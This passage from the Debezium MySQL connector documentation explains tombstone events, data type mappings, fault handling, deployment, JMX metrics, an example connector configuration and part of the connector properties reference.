changed in other circumstances).\n* The `ts_ms` shows the timestamp that Debezium processed this event.\n\nThis event gives a consumer all kinds of information that it can use to process the removal of this row. We include the old values so that some consumers might require them in order to properly handle the removal, and without it they may have to resort to far more complex behavior.\n\nThe MySQL connector's events are designed to work with https:\/\/cwiki.apache.org\/confluence\/display\/KAFKA\/Log+Compaction[Kafka log compaction], which allows for the removal of some older messages as long as at least the most recent message for every key is kept. This allows Kafka to reclaim storage space while ensuring the topic contains a complete dataset and can be used for reloading key-based state.\n\n[[tombstone-events]]\nWhen a row is deleted, the _delete_ event value listed above still works with log compaction, since Kafka can still remove all earlier messages with that same key. But only if the message value is null will Kafka know that it can remove _all messages_ with that same key. To make this possible, Debezium's MySQL connector always follows _delete_ event with a special _tombstone_ event that has the same key but null value.\n\n[NOTE]\n====\nAs of Kafka 0.10, the JSON converter provided by Kafka Connect never results in a null value for the message (https:\/\/issues.apache.org\/jira\/browse\/KAFKA-3832[KAFKA-3832]). Therefore, Kafka's log compaction will always retain the last message, even when the tombstone event is supplied, though it will be free to remove all prior messages with the same key. In other words, until this is fixed using the JSON Converter will reduce the effectiveness of Kafka's log compaction.\n\nIn the meantime, consider using the link:\/docs\/faq\/#avro-converter[Avro Converter], which does properly return a null value and will thus take full advantage of Kafka log compaction.\n====\n\n[[data-types]]\n=== Data types\n\nAs described above, the MySQL connector represents the changes to rows with events that are structured like the table in which the row exist. The event contains a field for each column value, and how that value is represented in the event depends on the MySQL data type of the column. This section describes this mapping.\n\nThe following table describes how the connector maps each of the MySQL data types to a _literal type_ and _semantic type_ within the events' fields. Here, the _literal type_ describes how the value is literally represented using Kafka Connect schema types, namely `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`. The _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n[cols=\"20%a,15%a,30%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`BOOLEAN`, `BOOL`\n|`BOOLEAN`\n|n\/a\n|\n\n|`BIT(1)`\n|`BOOLEAN`\n|n\/a\n|\n\n|`BIT( > 1)`\n|`BYTES`\n|`io.debezium.data.Bits`\n|The `length` schema parameter contains an integer representing the number of bits. The resulting `byte[]` will contain the bits in little-endian form and will be sized to contain at least the specified number of bits (e.g., `numBytes = n\/8 + (n%8== 0 ? 0 : 1)` where `n` is the number of bits).\n\n|`TINYINT`\n|`INT8`\n|n\/a\n|\n\n|`SMALLINT[(M)]`\n|`INT16`\n|n\/a\n|\n\n|`MEDIUMINT[(M)]`\n|`INT32`\n|n\/a\n|\n\n|`INT`, `INTEGER[(M)]`\n|`INT32`\n|n\/a\n|\n\n|`BIGINT[(M)]`\n|`INT64`\n|n\/a\n|\n\n|`REAL[(M,D)]`\n|`FLOAT32`\n|n\/a\n|\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\n|n\/a\n|\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\n|n\/a\n|\n\n|`CHAR(M)]`\n|`STRING`\n|n\/a\n|\n\n|`VARCHAR(M)]`\n|`STRING`\n|n\/a\n|\n\n|`BINARY(M)]`\n|`BYTES`\n|n\/a\n|\n\n|`VARBINARY(M)]`\n|`BYTES`\n|n\/a\n|\n\n|`TINYBLOB`\n|`BYTES`\n|n\/a\n|\n\n|`TINYTEXT`\n|`STRING`\n|n\/a\n|\n\n|`BLOB`\n|`BYTES`\n|n\/a\n|\n\n|`TEXT`\n|`STRING`\n|n\/a\n|\n\n|`MEDIUMBLOB`\n|`BYTES`\n|n\/a\n|\n\n|`MEDIUMTEXT`\n|`STRING`\n|n\/a\n|\n\n|`LONGBLOB`\n|`BYTES`\n|n\/a\n|\n\n|`LONGTEXT`\n|`STRING`\n|n\/a\n|\n\n|`JSON`\n|`STRING`\n|`io.debezium.data.Json`\n|Contains the string representation of a JSON document, array, or scalar.\n\n|`ENUM`\n|`STRING`\n|`io.debezium.data.Enum`\n|The `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`SET`\n|`STRING`\n|`io.debezium.data.EnumSet`\n|The `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`YEAR[(2\\|4)]`\n|`INT32`\n|`io.debezium.time.Year`\n|\n\n|`TIMESTAMP[(M)]`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp`\n| Contains an ISO8601 formatted date and time (with up to microsecond precision) in a particular time zone. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision.\n\n|=======================\n\nColumns that store strings are defined in MySQL with a character set and collation, either explicitly on the column's definition or implicitly by inheriting the table's, database's, or server's default character sets and collations. As of 0.3.1, the MySQL connector uses the column's character set when reading the binary representation of the column values in the binlog events.\n\nOther data type mappings are described in the following sections.\n\nIf present, a column's default value will be propagated to the corresponding field's Kafka Connect schema.\nFor `TIMESTAMP` columns who's default value is specified as `CURRENT_TIMESTAMP` or `NOW`, the value _1970-01-01 00:00:00_ will be used as the default value in the Kafka Connect schema.\nChange messages will contain the field's default value\n(unless an explicit column value had been given), so there should rarely be the need to obtain the default value from the schema.\nPassing the default value helps though with satisfying the compatibility rules when link:\/docs\/configuration\/avro\/[using Avro] as serialization format together with the Confluent schema registry.\n\n[[temporal-values]]\n==== Temporal values\n\nOther than MySQL's `TIMESTAMP` data type, the MySQL temporal types depend on the value of the `time.precision.mode` configuration property.\n\n[NOTE]\n====\nAs of Debezium 0.7 `adaptive_time_microseconds` mode was introduced and is the default `time.precision.mode` for the MySQL connector. Mode `adaptive` was marked as deprecated.\n====\n\n[WARNING]\n====\nWhen the `time.precision.mode` is set to `adaptive`, only positive TIME field values in the range of 00:00:00.000000 to 23:59:59.999999 can be captured correctly.\nWhen the `time.precision.mode` is set to `connect` only values in the range of `00:00:00.000` to `23:59:59.999` can be handled.\n\nThe `adaptive` and `connect` time precision modes should only be used if you can make sure that the TIME values in your tables will never exceed the supported ranges. These modes will be removed in a future version of Debezium.\n====\n\nWhen the `time.precision.mode` configuration property is set to `adaptive_time_microseconds` (the default), then the connector will determine the literal type and semantic type for MySQL types `TIME`, `DATE` and `DATETIME` based on the column's data type definition so that events _exactly_ represent the values in the database, all TIME fields will be captured as microseconds:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date`\n| Represents the number of days since epoch.\n\n|`TIME[(M)]`\n|`INT64`\n|`io.debezium.time.MicroTime`\n| Represents the time value in microseconds and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision.\n\n|`DATETIME`, `DATETIME(0)`, `DATETIME(1)`, `DATETIME(2)`, `DATETIME(3)`\n|`INT64`\n|`io.debezium.time.Timestamp`\n| Represents the number of milliseconds past epoch, and does not include timezone information.\n\n|`DATETIME(4)`, `DATETIME(5)`, `DATETIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp`\n| Represents the number of microseconds past epoch, and does not include timezone information.\n\n|=======================\n\nWhen the `time.precision.mode` configuration property is set to `adaptive` (deprecated), then the connector will determine the literal type and semantic type for the temporal types based on the column's data type definition so that events _exactly_ represent the values in the database:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date`\n| Represents the number of days since epoch.\n\n|`TIME`, `TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time`\n| Represents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime`\n| Represents the number of microseconds past midnight, and does not include timezone information.\n\n|`DATETIME`, `DATETIME(0)`, `DATETIME(1)`, `DATETIME(2)`, `DATETIME(3)`\n|`INT64`\n|`io.debezium.time.Timestamp`\n| Represents the number of milliseconds past epoch, and does not include timezone information.\n\n|`DATETIME(4)`, `DATETIME(5)`, `DATETIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp`\n| Represents the number of microseconds past epoch, and does not include timezone information.\n\n|=======================\n\nWhen the `time.precision.mode` configuration property is set to `connect`, then the connector will use the predefined Kafka Connect logical types as was the case with the 0.2.x MySQL connector. This may be useful when consumers only know about the built-in Kafka Connect logical types and are unable to handle variable-precision time values. On the other hand, since MySQL allows both `TIME` and `DATETIME` to have _fractional second precision_ of 0-6 to store up to microsecond precision, the events generated by a connector with the `connect` time precision mode will _*result in a loss of precision*_ when the database column has a _fractional second precision_ value greater than 3:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date`\n| Represents the number of days since epoch.\n\n|`TIME[(M)]`\n|`INT64`\n|`org.apache.kafka.connect.data.Time`\n| Represents the number of milliseconds since midnight, and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `M` > 3.\n\n|`DATETIME[(M)]`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp`\n| Represents the number of milliseconds since epoch, and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `M` > 3.\n\n|=======================\n\n[[zero-values]]\nMySQL allows http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/date-and-time-types.html[zero-values] for `DATE`, `DATETIME`, and `TIMESTAMP` columns, which are sometimes preferred over null values. These values cannot be represented using any of the Java types with either of the `time.precision.mode` options, and therefore the MySQL connector will represent them as `null` values when the column definition allows nulls, or as the _epoch day_ when the column does not allow nulls.\n\n[[temporal-values-without-timezone]]\n===== Temporal values without time zone\n\nThe `DATETIME` type represents a local date and time such as \"2018-01-13 09:48:27\",\ni.e. there's no time zone information.\nSuch columns are converted into epoch milli-seconds or micro-seconds (based on the column's precision) using UTC.\nSo e.g. the value \"2018-06-20 06:37:03\" of a column of type `DATETIME` (no precision given) will be represented by the value 1529476623000.\n\nThe `TIMESTAMP` type represents a timestamp without time zone information and is converted by MySQL from the server (or session's) current time zone into UTC when writing and vice versa when reading back the value.\nSuch columns are converted into an equivalent `io.debezium.time.ZonedTimestamp` in UTC based on the server (or session's) current time zone.\nThe timezone will be queried from the server by default.\nIf this fails, it must be specified explicitly as a connector option using the `database.serverTimezone` option.\nSo if for instance the database's time zone (either globally or configured for the connector by means of aforementioned option) is \"America\/Los_Angeles\",\nthe `TIMESTAMP` value \"2018-06-20 06:37:03\" will be represented by a `ZonedTimestamp` with the value \"2018-06-20T13:37:03Z\".\n\nNote that the timezone of the JVM running Kafka Connect and Debezium does not affect these conversions.\n\n[WARNING]\n====\nThe handling of these column types is based on using the non-legacy date\/time handling mode of the MySQL JDBC connector.\nIt is therefore strongly advised against passing the `database.useLegacyDatetimeCode` connector option with a value of `false`,\nas that may result in unexpected values of temporal columns in emitted change data messages.\n====\n\n[[decimal-values]]\n==== Decimal values\n\nWhen `decimal.handling.mode` configuration property is set to `precise`, then the connector will use the predefined Kafka Connect `org.apache.kafka.connect.data.Decimal` logical type for all `DECIMAL` and `NUMERIC` columns. This is the default mode.\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n|The `scaled` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n|The `scaled` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|=======================\n\nHowever, when `decimal.handling.mode` configuration property is set to `double`, then the connector will represent all `DECIMAL` and `NUMERIC` values as Java double values and encodes them as follows:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\n|\n|\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\n|\n|\n\n|=======================\n\nThe last option for `decimal.handling.mode` configuration property is `string`. In this case the connector will represent all `DECIMAL` and `NUMERIC` values as their formatted string representation and encodes them as follows:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\n|\n|\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\n|\n|\n\n|=======================\n\n[[spatial-types]]\n==== Spatial Data Types\n\nAs of version 0.5.1, the MySQL connector also has limited support for some of the following https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/spatial-datatypes.html[spatial data types]:\n\n[cols=\"20%a,15%a,30%a,35%a\",width=150,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Spatial Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`POINT`\n|`STRUCT`\n|`io.debezium.data.geometry.Point`\n|Contains a structure with 2 `FLOAT64` fields - `(x,y)` - each representing the coordinates of a geometric point and 1 optional `BYTES` field - `wkb` - representing the Well-Known Binary (WKB) of the coordinates of a geometric point\n\n|=======================\n\nAs of version 0.7.2, the MySQL connector has full support for all of the following https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/spatial-datatypes.html[spatial data types]:\n\n[cols=\"20%a,15%a,30%a,35%a\",width=150,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Spatial Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n|`GEOMETRY` +\n`LINESTRING` +\n`POLYGON` +\n`MULTIPOINT` +\n`MULTILINESTRING` +\n`MULTIPOLYGON` +\n`GEOMETRYCOLLECTION`\n|`STRUCT`\n|`io.debezium.data.geometry.Geometry`\n|Contains a structure with 2 fields +\n\n* `srid (INT32)` - Spatial Reference System Identifier defining what type of geometry object is stored in the structure\n* `wkb (BYTES)` - a binary representation of the geometry object encoded in the Well-Known-Binary format.\nPlease see http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification] for the format details.\n\n|=======================\n\n[[fault-tolerance]]\n[[when-things-go-wrong]]\n=== When things go wrong\n\nDebezium is a distributed system that captures all changes in multiple upstream databases, and will never miss or lose an event. Of course, when the system is operating nominally or being administered carefully, then Debezium provides _exactly once_ delivery of every change event. However, if a fault does happen then the system will still not lose any events, although while it is recovering from the fault it may repeat some change events. Thus, in these abnormal situations Debezium (like Kafka) provides _at least once_ delivery of change events.\n\nThe rest of this section describes how Debezium handles various kinds of faults and problems.\n\n==== Configuration and startup errors\n\nThe connector will fail upon startup, report an error\/exception in the log, and stop running when the connector's configuration is invalid, when the connector cannot successfully connect to MySQL using the specified connectivity parameters, or when the connector is restarting from a previously-recorded position in the MySQL history (via binlog coordinates or GTID set) and MySQL no longer has that history available.\n\nIn these cases, the error will have more details about the problem and possibly a suggested work around. The connector can be restarted when the configuration has been corrected or the MySQL problem has been addressed.\n\n==== MySQL becomes unavailable\n\nOnce the connector is running, if the MySQL server it has been connected to becomes unavailable for any reason, the connector will fail with an error and the connector will stop. Simply restart the connector when the server is available.\n\nNote that when using GTIDs and a highly available MySQL cluster, you can simply restart the connector immediately, and the connector will connect to a different MySQL server in the cluster, find the location in that server's binlog that represents the last transaction that was processed completely, and start reading the new server's binlog from that location.\n\nWhen the connector and MySQL are not using GTIDs, the connector records the position within the specific binlog of the MySQL server to which it is connected. These binlog coordinates are only valid on that MySQL server, so to recover the connector must do so only by connecting to that server (or to another server that has been recovered from backups of the MySQL server).\n\n==== Kafka Connect process stops gracefully\n\nIf Kafka Connect is being run in distributed mode, and a Kafka Connect process is stopped gracefully, then prior to shutdown of that processes Kafka Connect will migrate all of the process' connector tasks to another Kafka Connect process in that group, and the new connector tasks will pick up exactly where the prior tasks left off. There will be a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n==== Kafka Connect process crashes\n\nIf the Kafka Connector process stops unexpectedly, then any connector tasks it was running will obviously terminate without recording their most recently-processed offsets. When Kafka Connect is being run in distributed mode, it will restart those connector tasks on other processes. However, the MySQL connectors will resume from the last offset _recorded_ by the earlier processes, which means that the new replacement tasks may generate some of the same change events that were processed just prior to the crash. The number of duplicate events will depend on the offset flush period and the volume of data changes just before the crash.\n\n[TIP]\n====\nBecause there is a chance that some events may be duplicated during a recovery from failure, consumers should always anticipate some events may be duplicated. Debezium change are idempotent, so a sequence of events always results in the same state.\n\nDebezium also includes with each change event message the source-specific information about the origin of the event, including the MySQL server's time of the event, its binlog filename and position, and GTID (if used). Consumers can keep track of this information (especially GTIDs) to know whether it has already seen a particular event.\n====\n\n==== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka using the Kafka producer API. Kafka Connect will also periodically record the latest offset that appears in those change events, at a frequency you've specified in the Kafka Connect worker configuration. If the Kafka brokers become unavailable, the Kafka Connect worker process running the connectors will simply repeatedly attempt to reconnect to the Kafka brokers. In other words, the connector tasks will simply pause until a connection can be reestablished, at which point the connectors will resume exactly where they left off.\n\n==== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used and any new changes will be recorded in the MySQL server's binlog. When the connector is restarted, it will resume reading the MySQL binlog where it last left off, recording change events for all of the changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to https:\/\/engineering.linkedin.com\/kafka\/benchmarking-apache-kafka-2-million-writes-second-three-cheap-machines[massive throughput]. Kafka Connect is written with Kafka best practices, and given enough resources will also be able to handle very large numbers of database change events. Because of this, when a connector has been restarted after a while, it is very likely to catch up with the database, though how quickly will depend upon the capabilities and performance of Kafka and the volume of changes being made to the data in MySQL.\n\n[NOTE]\n====\nIf the connector remains stopped for long enough, MySQL might purge older binlog files and the connector's last position may be lost. In this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MySQL server will no longer have the starting point and the connector will perform an initial snapshot. On the other hand, if the connector's snapshot mode is disabled, then the connector will fail with an error.\n====\n\n[[configuration]]\n[[deploying-a-connector]]\n== Deploying a connector\n\nIf you've already installed https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and http:\/\/kafka.apache.org\/documentation.html#connect[Kafka Connect], then using Debezium's MySQL connector is easy. Simply download the https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mysql\/{debezium-version}\/debezium-connector-mysql-{debezium-version}-plugin.tar.gz[connector's plugin archive], extract the JARs into your Kafka Connect environment, and add the directory with the JARs to https:\/\/docs.confluent.io\/current\/connect\/userguide.html#installing-plugins[Kafka Connect's classpath]. Restart your Kafka Connect process to pick up the new JARs.\n\nIf immutable containers are your thing, then check out https:\/\/hub.docker.com\/r\/debezium\/[Debezium's Docker images] for Zookeeper, Kafka, and Kafka Connect with the MySQL connector already pre-installed and ready to go. Our link:http:\/\/debezium.io\/docs\/tutorial[tutorial] even walks you through using these images, and this is a great way to learn what Debezium is all about. You can even link:\/blog\/2016\/05\/31\/Debezium-on-Kubernetes\/[run Debezium on Kubernetes and OpenShift].\n\nTo use the connector to produce change events for a particular MySQL server or cluster, simply create a link:#configuration[configuration file for the MySQL Connector] and use the link:https:\/\/docs.confluent.io\/current\/connect\/references\/restapi.html[Kafka Connect REST API] to add that connector to your Kafka Connect cluster. When the connector starts, it will grab a consistent snapshot of the databases in your MySQL server and start reading the MySQL binlog, producing events for every inserted, updated, and deleted row. The connector can optionally produce events with the DDL statements that were applied, and you can even choose to produce events for a subset of the databases and tables. Optionally ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[[monitoring]]\n=== Monitoring\n\nKafka, Zookeeper, and Kafka Connect all have link:\/docs\/monitoring\/[built-in support] for JMX metrics. The MySQL connector also publishes a number of metrics about the connector's activities that can be monitored through JMX. The connector has two types of metrics. Snapshot metrics help you monitor the snapshot activity and are available when the connector is performing a snapshot. Binlog metrics help you monitor the progress and activity while the connector reads the MySQL binlog.\n\n[[monitoring-snapshots]]\n[[snapshot-metrics]]\n==== Snapshot Metrics\n\n===== *MBean: debezium.mysql:type=connector-metrics,context=snapshot,server=_<database.server.name>_*\n\n[cols=\"30%a,10%a,60%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Attribute Name\n|Type\n|Description\n\n|`TotalTableCount`\n|`int`\n|The total number of tables that are being included in the snapshot.\n\n|`RemainingTableCount`\n|`int`\n|The number of tables that the snapshot has yet to copy.\n\n|`HoldingGlobalLock`\n|`boolean`\n|Whether the connector currently holds a global or table write lock.\n\n|`SnapshotRunning`\n|`boolean`\n|Whether the snapshot was started.\n\n|`SnapshotAborted`\n|`boolean`\n|Whether the snapshot was aborted.\n\n|`SnapshotCompleted`\n|`boolean`\n|Whether the snapshot completed.\n\n|`SnapshotDurationInSeconds`\n|`long`\n|The total number of seconds that the snapshot has taken so far, even if not complete.\n\n|`RowsScanned`\n|`Map<String, Long>`\n|Map containing the number of rows scanned for each table in the snapshot. Tables are incrementally added to the Map during processing. Updates every 10,000 rows scanned and upon completing a table.\n|=======================\n\n\n[[monitoring-binlog]]\n[[binlog-metrics]]\n==== Binlog Metrics\n\n===== *MBean: debezium.mysql:type=connector-metrics,context=binlog,server=_<database.server.name>_*\n\n[cols=\"30%a,10%a,60%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Attribute Name\n|Type\n|Description\n\n|`Connected`\n|`boolean`\n|Flag that denotes whether the connector is currently connected to the MySQL server.\n\n|`BinlogFilename`\n|`string`\n|The name of the binlog filename that the connector has most recently read.\n\n|`BinlogPosition`\n|`long`\n|The most recent position (in bytes) within the binlog that the connector has read.\n\n|`IsGtidModeEnabled`\n|`boolean`\n|Flag that denotes whether the connector is currently tracking GTIDs from MySQL server.\n\n|`GtidSet`\n|`string`\n|The string representation of the most recent GTID set seen by the connector when reading the binlog.\n\n|`LastEvent`\n|`string`\n|The last binlog event that the connector has read.\n\n|`SecondsSinceLastEvent`\n|`long`\n|The number of seconds since the connector has read and processed the most recent event.\n\n|`SecondsBehindMaster`\n|`long`\n|The number of seconds between the last event's MySQL timestamp and the connector processing it. The values will incorporate any differences between the clocks on the machines where the MySQL server and the MySQL connector are running.\n\n|`TotalNumberOfEventsSeen`\n|`long`\n|The total number of events that this connector has seen since last started or reset.\n\n|`NumberOfSkippedEvents`\n|`long`\n|The number of events that have been skipped by the MySQL connector. Typically events are skipped due to a malformed or unparseable event from MySQL's binlog.\n\n|`NumberOfEventsFiltered`\n|`long`\n|The number of events that have been filtered by whitelist or blacklist filtering rules configured on the connector.\n\n|`NumberOfDisconnects`\n|`long`\n|The number of disconnects by the MySQL connector.\n\n|`NumberOfCommittedTransactions`\n|`long`\n|The number of processed transactions that were committed.\n\n|`NumberOfRolledBackTransactions`\n|`long`\n|The number of processed transactions that were rolled back and not streamed.\n\n|`NumberOfNotWellFormedTransactions`\n|`long`\n|The number of transactions that have not conformed to expected protocol `BEGIN` + `COMMIT`\/`ROLLBACK`. Should be `0` under normal conditions.\n\n|`NumberOfLargeTransactions`\n|`long`\n|The number of transactions that have not fitted into the look-ahead buffer. Should be significantly smaller than `NumberOfCommittedTransactions` and `NumberOfRolledBackTransactions` for optimal performance.\n|=======================\n_Note:_ The transactions related attributes are available only if binlog event buffering is enabled - see `binlog.buffer.size` for more details\n\n\n\n[[example]]\n[[example-configuration]]\n=== Example configuration\n\nUsing the MySQL connector is straightforward. Here is an example of the configuration for a MySQL connector that monitors a MySQL server at port 3306 on 192.168.99.100, which we logically name `fullfillment`:\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mysql.MySqlConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"3306\", \/\/ <4>\n \"database.user\": \"debezium\", \/\/ <5>\n \"database.password\": \"dbz\", \/\/ <6>\n \"database.server.id\": \"184054\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"database.whitelist\": \"inventory\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\", \/\/ <11>\n \"include.schema.changes\": \"true\" \/\/ <12>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of this MySQL connector class.\n<3> The address of the MySQL server.\n<4> The port number of the MySQL server.\n<5> The name of the MySQL user that has the link:#mysql-user[required privileges].\n<6> The password for the MySQL user that has the link:#mysql-user[required privileges].\n<7> The connector's identifier that must be unique within the MySQL cluster and similar to MySQL's `server-id` configuration property.\n<8> The logical name of the MySQL server\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the link:#avro-converter[Avro Connector] is used.\n<9> A list of all databases hosted by this server that this connector will monitor. This is optional, and there are other properties for listing the databases and tables to include or exclude from monitoring.\n<10> The list of Kafka brokers that this connector will use to write and recover DDL statements to the database history topic.\n<11> The name of the link:#database-schema-history[database history topic] where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.\n<12> The flag specifying that the connector should generate on the link:#schema-change-topic[schema change topic] named `fullfillment` events with the DDL changes that _can_ be used by consumers.\n\nSee the link:#connector-properties[complete list of connector properties] that can be specified in these configurations.\n\nThis configuration can be sent via POST to a running Kafka Connect service, which will then record the configuration and start up the one connector task that will connect to the MySQL database, read the binlog, and record events to Kafka topics.\n\n\n[[connector-properties]]\n=== Connector properties\n\nThe following configuration properties are _required_ unless a default value is available.\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`name`\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|`connector.class`\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium{zwsp}.connector.mysql.MySqlConnector` for the MySQL connector.\n\n|`tasks.max`\n|`1`\n|The maximum number of tasks that should be created for this connector. The MySQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|`database.hostname`\n|\n|IP address or hostname of the MySQL database server.\n\n|`database.port`\n|`3306`\n|Integer port number of the MySQL database server.\n\n|`database.user`\n|\n|Name of the MySQL database to use when connecting to the MySQL database server.\n\n|`database.password`\n|\n|Password to use when connecting to the MySQL database server.\n\n|`database.server.name`\n|_host:port_\n|Logical name that identifies and provides a namespace for the particular MySQL database server\/cluster being monitored. The logical name should be unique across all other connectors, since it is used as a prefix for all Kafka topic names emanating from this connector. Defaults to '_host_:_port_', where _host_ is the value of the `database.hostname` property and _port_ is the value of the `database.port` property, though we recommend using an explicit and meaningful logical name.\n\n|`database.server.id`\n|_random_\n|A numeric ID of this database client, which must be unique across all currently-running database processes in the MySQL cluster. This connector joins the MySQL database cluster as another server (with this unique ID) so it can read the binlog. By default, a random number is generated between 5400 and 6400, though we recommend setting an explicit value.\n\n|`database.history.kafka.topic`\n|\n|The full name of the Kafka topic where the connector will store the database schema history.\n\n|`database.history{zwsp}.kafka.bootstrap.servers`\n|\n|A list of host\/port pairs that the connector will use for establishing an initial connection to the Kafka cluster. This connection will be used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. This should point to the same Kafka cluster used by the Kafka Connect process.\n\n|`database.whitelist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be monitored; any database name not included in the whitelist will be excluded from monitoring. By default all databases will be monitored. May not be used with `database.blacklist`.\n\n|`database.blacklist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be excluded from monitoring; any database name not included in the blacklist will be monitored. May not be used with `database.whitelist`.\n\n|`table.whitelist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables to be monitored; any table not included in the whitelist will be excluded from monitoring. Each identifier is of the form _databaseName_._tableName_. By default the connector will monitor every non-system table in each monitored database. May not be used with `table.blacklist`.\n\n|`table.blacklist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables to be excluded from monitoring; any table not included in the blacklist will be monitored. Each identifier is of the form _databaseName_._tableName_. May not be used with `table.whitelist`.\n\n|`column.blacklist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event message values. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`column.truncate.to._length_.chars`\n|_n\/a_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be truncated in the change event message values if the field values are longer than the specified number of characters. Multiple properties with different lengths can be used in a single configuration, although in each the length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or 